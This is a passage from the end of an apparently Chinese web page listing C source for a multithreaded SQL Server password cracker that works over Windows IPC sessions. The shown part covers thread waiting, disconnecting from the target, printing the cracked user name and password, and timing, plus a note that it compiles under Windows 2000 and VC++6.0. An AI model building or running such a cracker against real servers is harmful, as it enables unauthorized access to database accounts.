>printf("\nAll thread done."); break; case WAIT_TIMEOUT: printf("\nWait time out.Exit."); break; case WAIT_FAILED: printf("\nWaitForSingleObject() failed."); break; } file://断开与目标机器的IPC Session DelIPC(target); file://探测密码成功后回显信息 if(Cracked==TRUE) printf("\n\nSuccess!%s SQL Server User [%s] passwd is [%s].",target,UserName,passwd); file://记时结束 end=clock(); file://转换时间格式 duration = (double)(end - start) / CLOCKS_PER_SEC; file://显示所用时间 printf("\n\nComplete.Use %2.1f seconds.\n",duration); return 0; } //////////////////////////////////////////////////////////////////////// 程序在windows2000,vc++6.0环境下编译通过。
上一页 [1] [2] [3] [4] [5] [6]
|